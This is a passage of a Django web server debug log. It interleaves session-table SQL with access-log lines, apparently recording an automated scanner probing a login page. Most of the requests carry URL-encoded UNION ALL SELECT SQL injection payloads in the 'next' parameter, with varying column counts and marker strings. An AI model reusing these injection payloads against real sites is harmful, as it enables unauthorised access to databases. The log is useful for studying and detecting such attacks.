'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 29, 478429, tzinfo=)) [01/Jan/2020 15:25:29] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27XrrejDwHHUDFDHYnsvgPSLPRXfTHgcuHPULVhjxG%27%7C%7C%27qppzq%27%2C62%2C62%20FROM%20MSysAccessObjects--%20hswV HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:29,641 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'pco6k3tig4zgrjf2f4f5xbbii5uxtpne' LIMIT 1; args=('pco6k3tig4zgrjf2f4f5xbbii5uxtpne',) DEBUG 2020-01-01 15:25:29,643 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('pco6k3tig4zgrjf2f4f5xbbii5uxtpne', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:29.641902+00:00'::timestamptz); args=('pco6k3tig4zgrjf2f4f5xbbii5uxtpne', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 29, 641902, tzinfo=)) [01/Jan/2020 15:25:29] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27KknOapfAieEZNdbpNyeQvgOBPdBqpNOinBBHQMuo%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20PHqH HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:29,813 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'r2zuyxvh4xh844lrsu2r3w4rrg437gdp' LIMIT 1; args=('r2zuyxvh4xh844lrsu2r3w4rrg437gdp',) DEBUG 2020-01-01 15:25:29,815 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('r2zuyxvh4xh844lrsu2r3w4rrg437gdp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:29.813800+00:00'::timestamptz); args=('r2zuyxvh4xh844lrsu2r3w4rrg437gdp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 29, 813800, tzinfo=)) [01/Jan/2020 15:25:29] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C%27qxvkq%27%7C%7C%27DgZFiQKKsnnrNUkXQPPVeDnHZCIXEWHhUvkFFLmo%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20rcEd HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:29,959 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'f5iao0vys6h3z7oq4zqynen36xms5rn4' LIMIT 1; args=('f5iao0vys6h3z7oq4zqynen36xms5rn4',) DEBUG 2020-01-01 15:25:29,962 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('f5iao0vys6h3z7oq4zqynen36xms5rn4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:29.960144+00:00'::timestamptz); args=('f5iao0vys6h3z7oq4zqynen36xms5rn4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 29, 960144, tzinfo=)) [01/Jan/2020 15:25:29] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20%27qxvkq%27%7C%7C%27klermMNSvpuUURhPvaEvpwXRvjVLDdftvUswcrRY%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20zLwb HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:30,109 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '4d3k6pa06wiby2d2z618crufjqwhmfzk' LIMIT 1; args=('4d3k6pa06wiby2d2z618crufjqwhmfzk',) DEBUG 2020-01-01 15:25:30,111 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('4d3k6pa06wiby2d2z618crufjqwhmfzk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:30.109714+00:00'::timestamptz); args=('4d3k6pa06wiby2d2z618crufjqwhmfzk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 30, 109714, tzinfo=)) [01/Jan/2020 15:25:30] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27UeFLGylmajcuQDttBiyQgTqzOjRNLLxhPzPUgWvq%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20Kgjd HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:30,259 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ab0znnk0ya7g44zpmdb58akwjz4hxfj2' LIMIT 1; args=('ab0znnk0ya7g44zpmdb58akwjz4hxfj2',) DEBUG 2020-01-01 15:25:30,261 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ab0znnk0ya7g44zpmdb58akwjz4hxfj2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:30.259799+00:00'::timestamptz); args=('ab0znnk0ya7g44zpmdb58akwjz4hxfj2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 30, 259799, tzinfo=)) [01/Jan/2020 15:25:30] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27RWNZUCbcXnVEemTbSGxCWEPviyVqzYUPWwUyFnVd%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20ISYg HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:30,430 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bivaohempsirt9d1ppra3ujvfq6dk1ew' LIMIT 1; args=('bivaohempsirt9d1ppra3ujvfq6dk1ew',) DEBUG 2020-01-01 15:25:30,432 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bivaohempsirt9d1ppra3ujvfq6dk1ew', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:30.430794+00:00'::timestamptz); args=('bivaohempsirt9d1ppra3ujvfq6dk1ew', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 30, 430794, tzinfo=)) [01/Jan/2020 15:25:30] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27guQUwZFLBxALJlSzkWVaIYGozNHrwFQHOGQmhRLZ%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20RHXx HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:30,593 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2t8ul4x58vxkcvlvm1vdlc7e33i96dsy' LIMIT 1; args=('2t8ul4x58vxkcvlvm1vdlc7e33i96dsy',) DEBUG 2020-01-01 15:25:30,596 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2t8ul4x58vxkcvlvm1vdlc7e33i96dsy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:30.594149+00:00'::timestamptz); args=('2t8ul4x58vxkcvlvm1vdlc7e33i96dsy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 30, 594149, tzinfo=)) [01/Jan/2020 15:25:30] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27VpGXRHHSzqcjooaXgqZKOSLYLJJBDyDOqmqfBtFR%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20AzvL HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:30,758 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '4j374x54kr0ofr5qbqy07oetp6lnc9ti' LIMIT 1; args=('4j374x54kr0ofr5qbqy07oetp6lnc9ti',) DEBUG 2020-01-01 15:25:30,761 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('4j374x54kr0ofr5qbqy07oetp6lnc9ti', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:30.759124+00:00'::timestamptz); args=('4j374x54kr0ofr5qbqy07oetp6lnc9ti', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 30, 759124, tzinfo=)) [01/Jan/2020 15:25:30] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27KDbhKKqtnMmTdVUdPybLbNSugdfUklLCHprIvpIn%27%7C%7C%27qppzq%27%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20TbQm HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:30,931 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'kf6trizweku5qj196wowugqgsj506qfd' LIMIT 1; args=('kf6trizweku5qj196wowugqgsj506qfd',) DEBUG 2020-01-01 15:25:30,933 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('kf6trizweku5qj196wowugqgsj506qfd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:30.931980+00:00'::timestamptz); args=('kf6trizweku5qj196wowugqgsj506qfd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 30, 931980, tzinfo=)) [01/Jan/2020 15:25:30] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27spJnLdrjMdHphubpzhHswiPRQxUstHbfPxLUbqVd%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20xZeA HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:31,094 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qu9b3khfjuklon3jza29l571lydgiw5t' LIMIT 1; args=('qu9b3khfjuklon3jza29l571lydgiw5t',) DEBUG 2020-01-01 15:25:31,096 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qu9b3khfjuklon3jza29l571lydgiw5t', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:31.094589+00:00'::timestamptz); args=('qu9b3khfjuklon3jza29l571lydgiw5t', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 31, 94589, tzinfo=)) [01/Jan/2020 15:25:31] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27jTCZgNueXpLQYdWzqytMGvKWbzKCznDnDfmyRjQz%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20YmDz HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:31,263 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'azzye1olifygcmvzfbwt6vff6r1nm4qv' LIMIT 1; args=('azzye1olifygcmvzfbwt6vff6r1nm4qv',) DEBUG 2020-01-01 15:25:31,266 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('azzye1olifygcmvzfbwt6vff6r1nm4qv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:31.264226+00:00'::timestamptz); args=('azzye1olifygcmvzfbwt6vff6r1nm4qv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 31, 264226, tzinfo=)) [01/Jan/2020 15:25:31] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27ahBafUIdmfnbRHvlicbMDfhCNJGmoaovGTCtHipi%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20qihx HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:31,417 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ko7pfgck8oh6kv3kxslwj7hb8rzxolv3' LIMIT 1; args=('ko7pfgck8oh6kv3kxslwj7hb8rzxolv3',) DEBUG 2020-01-01 15:25:31,418 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ko7pfgck8oh6kv3kxslwj7hb8rzxolv3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:31.417423+00:00'::timestamptz); args=('ko7pfgck8oh6kv3kxslwj7hb8rzxolv3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 31, 417423, tzinfo=)) [01/Jan/2020 15:25:31] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27dYgewANDXdYDIeToZMjKDNggARPGWjoVDjNZjDua%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20LyPa HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:31,557 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lywb7toy8syc5yrqv2myybmhkiv75rzh' LIMIT 1; args=('lywb7toy8syc5yrqv2myybmhkiv75rzh',) DEBUG 2020-01-01 15:25:31,558 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lywb7toy8syc5yrqv2myybmhkiv75rzh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:31.557442+00:00'::timestamptz); args=('lywb7toy8syc5yrqv2myybmhkiv75rzh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 31, 557442, tzinfo=)) [01/Jan/2020 15:25:31] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27YYXznkAbDvFGTPPwSVaTCorqujtRcequOniXHqIP%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20XSym HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:31,709 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'nxhhltgnshuiwr319lp7dm35hjy5oe0n' LIMIT 1; args=('nxhhltgnshuiwr319lp7dm35hjy5oe0n',) DEBUG 2020-01-01 15:25:31,711 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('nxhhltgnshuiwr319lp7dm35hjy5oe0n', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:31.710129+00:00'::timestamptz); args=('nxhhltgnshuiwr319lp7dm35hjy5oe0n', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 31, 710129, tzinfo=)) [01/Jan/2020 15:25:31] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C%27qxvkq%27%7C%7C%27KnFEzIOrltqSvJtxoXMseahEmRtkJeLYRxePMmeL%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20aHTU HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:31,876 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'moq6jb7pkds22aeiq7y6gjsa4pdcsmnt' LIMIT 1; args=('moq6jb7pkds22aeiq7y6gjsa4pdcsmnt',) DEBUG 2020-01-01 15:25:31,879 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('moq6jb7pkds22aeiq7y6gjsa4pdcsmnt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:31.877166+00:00'::timestamptz); args=('moq6jb7pkds22aeiq7y6gjsa4pdcsmnt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 31, 877166, tzinfo=)) [01/Jan/2020 15:25:31] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27KlbeBjAoOExnIXreWHNyDGEwXGpAkWENiNecYVnv%27%7C%7C%27qppzq%27%2C62%20FROM%20MSysAccessObjects--%20kOJC HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:32,019 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ax84yc1vu0r6n5hdpog6cwh1q1uxtmmt' LIMIT 1; args=('ax84yc1vu0r6n5hdpog6cwh1q1uxtmmt',) DEBUG 2020-01-01 15:25:32,021 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ax84yc1vu0r6n5hdpog6cwh1q1uxtmmt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:32.019823+00:00'::timestamptz); args=('ax84yc1vu0r6n5hdpog6cwh1q1uxtmmt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 32, 19823, tzinfo=)) [01/Jan/2020 15:25:32] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27zgxUrmWfKkTGstiUhhfAypQMMNjpURwzwMXrnBXt%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20Didj HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:32,190 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'sh0l61o7n2sj9w0on3oq3tw7iymck56g' LIMIT 1; args=('sh0l61o7n2sj9w0on3oq3tw7iymck56g',) DEBUG 2020-01-01 15:25:32,192 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('sh0l61o7n2sj9w0on3oq3tw7iymck56g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:32.190930+00:00'::timestamptz); args=('sh0l61o7n2sj9w0on3oq3tw7iymck56g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 32, 190930, tzinfo=)) [01/Jan/2020 15:25:32] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C%27qxvkq%27%7C%7C%27mdcsKuvsjEnPHklKdfHFXZezHFIRyEsFeXANZPGF%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20yDmC HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:32,363 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '0vh09leyzldqk4082l1vz9342nr70dlz' LIMIT 1; args=('0vh09leyzldqk4082l1vz9342nr70dlz',) DEBUG 2020-01-01 15:25:32,366 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('0vh09leyzldqk4082l1vz9342nr70dlz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:32.364161+00:00'::timestamptz); args=('0vh09leyzldqk4082l1vz9342nr70dlz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 32, 364161, tzinfo=)) [01/Jan/2020 15:25:32] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27kYBRRxNbXRNKoOHzzRmdBJzMuSaBglmVsBNpEFnP%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20UaDD HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:32,526 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '299zyvgxl1wdixt7jdcdl046ulrihma6' LIMIT 1; args=('299zyvgxl1wdixt7jdcdl046ulrihma6',) DEBUG 2020-01-01 15:25:32,528 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('299zyvgxl1wdixt7jdcdl046ulrihma6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:32.527185+00:00'::timestamptz); args=('299zyvgxl1wdixt7jdcdl046ulrihma6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 32, 527185, tzinfo=)) [01/Jan/2020 15:25:32] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27wdwhaZgVygBwPkDJimDLccNGNUMXYfccgoqNJYYf%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20yqlt HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:32,687 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mvq6hmzepcya7qmno8khxmfsmzf3bomu' LIMIT 1; args=('mvq6hmzepcya7qmno8khxmfsmzf3bomu',) DEBUG 2020-01-01 15:25:32,689 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mvq6hmzepcya7qmno8khxmfsmzf3bomu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:32.688245+00:00'::timestamptz); args=('mvq6hmzepcya7qmno8khxmfsmzf3bomu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 32, 688245, tzinfo=)) [01/Jan/2020 15:25:32] "GET 